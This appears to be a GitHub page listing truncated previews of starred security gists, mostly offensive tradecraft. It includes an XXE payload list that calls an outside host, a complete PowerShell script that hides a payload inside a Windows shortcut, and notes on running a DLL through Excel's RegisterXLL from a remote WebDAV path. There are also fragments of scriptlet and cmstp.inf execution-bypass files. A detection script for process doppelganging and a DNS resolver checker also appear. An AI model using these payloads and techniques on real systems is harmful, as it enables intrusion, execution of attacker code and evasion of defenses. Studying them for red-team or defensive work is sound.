Skip to content

Instantly share code, notes, and snippets.

View api0cradle's full-sized avatar

Oddvar Moe api0cradle

748 followers · 11 following
View GitHub Profile
@staaldraad
staaldraad / XXE_payloads
Last active May 24, 2024 11:08
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@3gstudent
3gstudent / shortcut.ps1
Created December 30, 2016 03:10
Hide payload into Windows shortcut
$file = Get-Content "c:\test\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
@ryhanson
ryhanson / ExcelXLL.md
Last active March 29, 2024 05:27
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@NickTyrer
NickTyrer / powersct.sct
Last active April 9, 2024 17:06
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script
@dezhub
dezhub / Get-Doppelgangers.ps1
Created December 21, 2017 21:08
function Get-Doppelgangers
{
<#
.SYNOPSIS
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
@NickTyrer
NickTyrer / cmstp.inf
Last active January 5, 2024 13:16
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
@curi0usJack
curi0usJack / exeoutputsearch.ps1
Last active January 8, 2023 01:40
$exepath = "c:\windows"
$searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path")
$skip = @("logoff.exe", "mcrmgr.exe", "audit.exe")
$foundin = @()
$testedbins = @()
Function Execute-Command ($commandPath, $commandArguments)
{
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = $commandPath
@jakobhuss
jakobhuss / resolvers.sh
Last active March 15, 2022 06:29
Basic script for finding a list of dns resolvers that are "good". Usage is resolvers.sh or resolvers.sh domain-name.com
#!/usr/bin/bash
if [ $# -eq 0 ]; then
test_domain=example.com
else
test_domain=$1
fi
function rand(){
cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 32 | head -n 1
@HackingLZ
HackingLZ / coalmine.py
Last active March 24, 2024 14:54
#!/usr/bin/python3
import re
import zipfile
import argparse
from urllib.parse import urlparse
from colorama import Fore
from colorama import Style
from colorama import init